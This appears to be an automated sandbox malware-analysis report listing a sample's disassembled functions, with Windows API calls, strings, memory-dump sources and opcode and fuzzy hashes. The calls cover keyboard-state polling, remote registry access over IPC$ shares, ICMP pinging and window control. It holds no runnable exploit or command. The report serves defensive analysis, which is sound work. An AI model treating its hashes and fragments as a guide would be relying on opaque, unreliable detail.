                • Opcode Fuzzy Hash: 305c893fdb97dc234e428d6664e643e9f31f88bee30ae26bf872c4e2042784fe
                • Instruction Fuzzy Hash: 7C31D471900109ABDB21ABA0DC48FEF37BDEF89B00F5441B6F515D6050EB7497858B64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                Download Yara Rule
                APIs
                • timeGetTime.WINMM ref: 0017E6B4
                  • Part of subcall function 0012E551: timeGetTime.WINMM(?,?,0017E6D4), ref: 0012E555
                • Sleep.KERNEL32(0000000A), ref: 0017E6E1
                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0017E705
                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0017E727
                • SetActiveWindow.USER32 ref: 0017E746
                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0017E754
                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0017E773
                • Sleep.KERNEL32(000000FA), ref: 0017E77E
                • IsWindow.USER32 ref: 0017E78A
                • EndDialog.USER32(00000000), ref: 0017E79B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                • String ID: BUTTON
                • API String ID: 1194449130-3405671355
                • Opcode ID: a0fd858774e034babba52c4d96d65f8cd4c8fb44c2273dcecc3c1b6c989f869e
                • Instruction ID: 97e13e954bb1f07789a76ec9b1b5df312fd1e0bd4e0cd840eb175f4ecb6b2f88
                • Opcode Fuzzy Hash: a0fd858774e034babba52c4d96d65f8cd4c8fb44c2273dcecc3c1b6c989f869e
                • Instruction Fuzzy Hash: 1D219670200245AFEF005FA4ECD9A293BFDF75D349F108465F91DC6AB1DBB1AD809AA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0017EA5D
                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0017EA73
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0017EA84
                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0017EA96
                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0017EAA7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: SendString$_wcslen
                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                • API String ID: 2420728520-1007645807
                • Opcode ID: 81fe1ec653ee229606f08871e62947fdbb2e5040b0688bc2c6eb88f9cce53d0b
                • Instruction ID: 10c7d4a6f89562518433e95e79ec7e1d3aaf660148e07558348e6e15c0e36982
                • Opcode Fuzzy Hash: 81fe1ec653ee229606f08871e62947fdbb2e5040b0688bc2c6eb88f9cce53d0b
                • Instruction Fuzzy Hash: E7115131A902197DD728A7A5DC5ADFF6BBCEBD5B04F40042AB811A21D1EB701A45C5B0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00175CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                Download Yara Rule
                APIs
                • GetDlgItem.USER32(?,00000001), ref: 00175CE2
                • GetWindowRect.USER32(00000000,?), ref: 00175CFB
                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00175D59
                • GetDlgItem.USER32(?,00000002), ref: 00175D69
                • GetWindowRect.USER32(00000000,?), ref: 00175D7B
                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00175DCF
                • GetDlgItem.USER32(?,000003E9), ref: 00175DDD
                • GetWindowRect.USER32(00000000,?), ref: 00175DEF
                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00175E31
                • GetDlgItem.USER32(?,000003EA), ref: 00175E44
                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00175E5A
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00175E67
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$ItemMoveRect$Invalidate
                • String ID:
                • API String ID: 3096461208-0
                • Opcode ID: e1c0a83264a4ef02142a2e64b667d0ca1d51cbdee28b2d815d19254dfa79b892
                • Instruction ID: 7d6db8c9ce7b7c52b4f5659c6c1f4fc0f13a03c20f5964235ab14a008e454676
                • Opcode Fuzzy Hash: e1c0a83264a4ef02142a2e64b667d0ca1d51cbdee28b2d815d19254dfa79b892
                • Instruction Fuzzy Hash: F0510171B00605AFDF18CFA8DD89AAEBBB6FB48310F148129F519E7690D7709E44CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00128BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00128F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00128BE8,?,00000000,?,?,?,?,00128BBA,00000000,?), ref: 00128FC5
                • DestroyWindow.USER32(?), ref: 00128C81
                • KillTimer.USER32(00000000,?,?,?,?,00128BBA,00000000,?), ref: 00128D1B
                • DestroyAcceleratorTable.USER32(00000000), ref: 00166973
                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00128BBA,00000000,?), ref: 001669A1
                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00128BBA,00000000,?), ref: 001669B8
                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00128BBA,00000000), ref: 001669D4
                • DeleteObject.GDI32(00000000), ref: 001669E6
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                • String ID:
                • API String ID: 641708696-0
                • Opcode ID: d1e50f87202f84d433ff6891285ce31f2a4ae7412d01246506989f17d4e53979
                • Instruction ID: 31283eda10cf8fc7aa77e247a6866db07b9ccc172f2dbb0e04bc1d881f8ec252
                • Opcode Fuzzy Hash: d1e50f87202f84d433ff6891285ce31f2a4ae7412d01246506989f17d4e53979
                • Instruction Fuzzy Hash: BC618A31502660EFDB259F64EE88B6AB7F1FB5131AF15451CE0429B961CB35ACF0CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00129838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00129944: GetWindowLongW.USER32(?,000000EB), ref: 00129952
                • GetSysColor.USER32(0000000F), ref: 00129862
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ColorLongWindow
                • String ID:
                • API String ID: 259745315-0
                • Opcode ID: b50fc5524f019da53d12898840b1d0ea8b7a0c761c71ab8e1d3ba2aba45eeef6
                • Instruction ID: 6c81700b9938d485880847a90ead8d8e0ecc0d1ed480b2a6603c9daaa1fc8ea4
                • Opcode Fuzzy Hash: b50fc5524f019da53d12898840b1d0ea8b7a0c761c71ab8e1d3ba2aba45eeef6
                • Instruction Fuzzy Hash: B841F531604654EFDB245F3CAC88BB93BA5EB17334F184645F9A2872E2C7309CA2DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001796E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0015F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00179717
                • LoadStringW.USER32(00000000,?,0015F7F8,00000001), ref: 00179720
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0015F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00179742
                • LoadStringW.USER32(00000000,?,0015F7F8,00000001), ref: 00179745
                • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00179866
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HandleLoadModuleString$Message_wcslen
                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                • API String ID: 747408836-2268648507
                • Opcode ID: c4f9256377180118f66ddfe61a29ca290b38186770674984b362a7e0c12584af
                • Instruction ID: 325f1fb29809cac12facfbf127a9107e703b6477e02521dca19043fb075e45c3
                • Opcode Fuzzy Hash: c4f9256377180118f66ddfe61a29ca290b38186770674984b362a7e0c12584af
                • Instruction Fuzzy Hash: 5441417290021DAADF08EBE0DD96EEE7778AF25340F504035F61576092EB356F88CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001706DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001707A2
                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001707BE
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001707DA
                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00170804
                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0017082C
                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00170837
                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0017083C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                • API String ID: 323675364-22481851
                • Opcode ID: 6fde7e844d2f2613d2953930b3f169dfccdc9dfba6c1e91a3c8ddf595b13a6e5
                • Instruction ID: c67aec9e4202bd652a2935a85810715b16bdd5e5a3116a72cdec6e51eeed5c21
                • Opcode Fuzzy Hash: 6fde7e844d2f2613d2953930b3f169dfccdc9dfba6c1e91a3c8ddf595b13a6e5
                • Instruction Fuzzy Hash: FD411872C10229EBCF19EBA4DC95CEDB778BF18354F44412AF915A3161EB30AE84CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00193C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(?), ref: 00193C5C
                • CoInitialize.OLE32(00000000), ref: 00193C8A
                • CoUninitialize.OLE32 ref: 00193C94
                • _wcslen.LIBCMT ref: 00193D2D
                • GetRunningObjectTable.OLE32(00000000,?), ref: 00193DB1
                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00193ED5
                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00193F0E
                • CoGetObject.OLE32(?,00000000,001AFB98,?), ref: 00193F2D
                • SetErrorMode.KERNEL32(00000000), ref: 00193F40
                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00193FC4
                • VariantClear.OLEAUT32(?), ref: 00193FD8
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                • String ID:
                • API String ID: 429561992-0
                • Opcode ID: 25be4627a0f1724b0e83466090f397e2dd0d4bb636142495185efe2a5e10c554
                • Instruction ID: c3ba81f925ef9167d5693929e12257c3d5b56b1423f14b8946aac90afea0423b
                • Opcode Fuzzy Hash: 25be4627a0f1724b0e83466090f397e2dd0d4bb636142495185efe2a5e10c554
                • Instruction Fuzzy Hash: F8C135716083059FCB04DF68C88496BB7E9FF89744F00491DF99A9B250DB30EE46CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00187A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                Download Yara Rule
                APIs
                • CoInitialize.OLE32(00000000), ref: 00187AF3
                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00187B8F
                • SHGetDesktopFolder.SHELL32(?), ref: 00187BA3
                • CoCreateInstance.OLE32(001AFD08,00000000,00000001,001D6E6C,?), ref: 00187BEF
                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00187C74
                • CoTaskMemFree.OLE32(?,?), ref: 00187CCC
                • SHBrowseForFolderW.SHELL32(?), ref: 00187D57
                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00187D7A
                • CoTaskMemFree.OLE32(00000000), ref: 00187D81
                • CoTaskMemFree.OLE32(00000000), ref: 00187DD6
                • CoUninitialize.OLE32 ref: 00187DDC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                • String ID:
                • API String ID: 2762341140-0
                • Opcode ID: ce61db49140b09527500c38a496bb1cde1c50d02c745c956dbd1c8acb05892df
                • Instruction ID: 3b5e7bd8556f3de938759cc8226a80182ef1a2c0f19ea73b53bba5dd5a158230
                • Opcode Fuzzy Hash: ce61db49140b09527500c38a496bb1cde1c50d02c745c956dbd1c8acb05892df
                • Instruction Fuzzy Hash: C6C10B75A04109AFCB14DFA4C884DAEBBF9FF48314B1485A9E8199B761D730EE85CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001A5504
                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001A5515
                • CharNextW.USER32(00000158), ref: 001A5544
                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001A5585
                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001A559B
                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001A55AC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$CharNext
                • String ID:
                • API String ID: 1350042424-0
                • Opcode ID: fa9ad2a0c825cff328f67718347f7429b98839bf0185213cbd9e34d967a7bc50
                • Instruction ID: 0ec1fb882d231fd604150fa08ab999493920b7f1329d0a3b802921bdd6d9ffcb
                • Opcode Fuzzy Hash: fa9ad2a0c825cff328f67718347f7429b98839bf0185213cbd9e34d967a7bc50
                • Instruction Fuzzy Hash: 5D616E79908608EBDF10DF94DC849FE7BBAEB0B724F104145F925AB291D7748A80DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0016FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                Download Yara Rule
                APIs
                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0016FAAF
                • SafeArrayAllocData.OLEAUT32(?), ref: 0016FB08
                • VariantInit.OLEAUT32(?), ref: 0016FB1A
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0016FB3A
                • VariantCopy.OLEAUT32(?,?), ref: 0016FB8D
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 0016FBA1
                • VariantClear.OLEAUT32(?), ref: 0016FBB6
                • SafeArrayDestroyData.OLEAUT32(?), ref: 0016FBC3
                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0016FBCC
                • VariantClear.OLEAUT32(?), ref: 0016FBDE
                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0016FBE9
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                • String ID:
                • API String ID: 2706829360-0
                • Opcode ID: a118c73d7b3dcfbc47924cec918b141c35e569e570d010294f06859242888c85
                • Instruction ID: aab7eb2f45bb5410bb509081f2735985a5412f97f7dc44db4780e2b1916e15c4
                • Opcode Fuzzy Hash: a118c73d7b3dcfbc47924cec918b141c35e569e570d010294f06859242888c85
                • Instruction Fuzzy Hash: 3F416235A00219DFCB04DF68DC549EEBBB9FF19344F008069E905A7261CB30E956CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00179C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?), ref: 00179CA1
                • GetAsyncKeyState.USER32(000000A0), ref: 00179D22
                • GetKeyState.USER32(000000A0), ref: 00179D3D
                • GetAsyncKeyState.USER32(000000A1), ref: 00179D57
                • GetKeyState.USER32(000000A1), ref: 00179D6C
                • GetAsyncKeyState.USER32(00000011), ref: 00179D84
                • GetKeyState.USER32(00000011), ref: 00179D96
                • GetAsyncKeyState.USER32(00000012), ref: 00179DAE
                • GetKeyState.USER32(00000012), ref: 00179DC0
                • GetAsyncKeyState.USER32(0000005B), ref: 00179DD8
                • GetKeyState.USER32(0000005B), ref: 00179DEA
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: 2008bd6b1ad031f09e5634a7ab1cd4a72f6ee6f2f38db16622d8dc59229ba820
                • Instruction ID: 3f289a1ebfee20009c450cc5f4d865a7cae356f9e1923328544d526078bc6c67
                • Opcode Fuzzy Hash: 2008bd6b1ad031f09e5634a7ab1cd4a72f6ee6f2f38db16622d8dc59229ba820
                • Instruction Fuzzy Hash: 224189345047CA6DFF3596A4C4043B5BEB16F12344F48C05ADACE566C2EBA599CCC792
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                Download Yara Rule
                APIs
                • WSAStartup.WSOCK32(00000101,?), ref: 001905BC
                • inet_addr.WSOCK32(?), ref: 0019061C
                • gethostbyname.WSOCK32(?), ref: 00190628
                • IcmpCreateFile.IPHLPAPI ref: 00190636
                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001906C6
                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001906E5
                • IcmpCloseHandle.IPHLPAPI(?), ref: 001907B9
                • WSACleanup.WSOCK32 ref: 001907BF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                • String ID: Ping
                • API String ID: 1028309954-2246546115
                • Opcode ID: a7a0de72958c6ee876f8466a4faeb8b54e8d46e87ec2d8ca3c9c70032d8ff701
                • Instruction ID: b5bf08510366301e73b0f5795a473c53def0af2cdc93af150ed1d01c0d983a34
                • Opcode Fuzzy Hash: a7a0de72958c6ee876f8466a4faeb8b54e8d46e87ec2d8ca3c9c70032d8ff701
                • Instruction Fuzzy Hash: 85919E356042019FDB25CF55D888F1ABBE0AF48328F1585A9F4A98B6A2C730FD85CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00198CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$BuffCharLower
                • String ID: cdecl$none$stdcall$winapi
                • API String ID: 707087890-567219261
                • Opcode ID: 1125af3ba84fcb57f6eb32a4000786138d207814948eaada18722300cb055f0c
                • Instruction ID: f0d10c33534a6235e2cc763984c92f381ce742ffb90a1b1c559539d02eb4b561
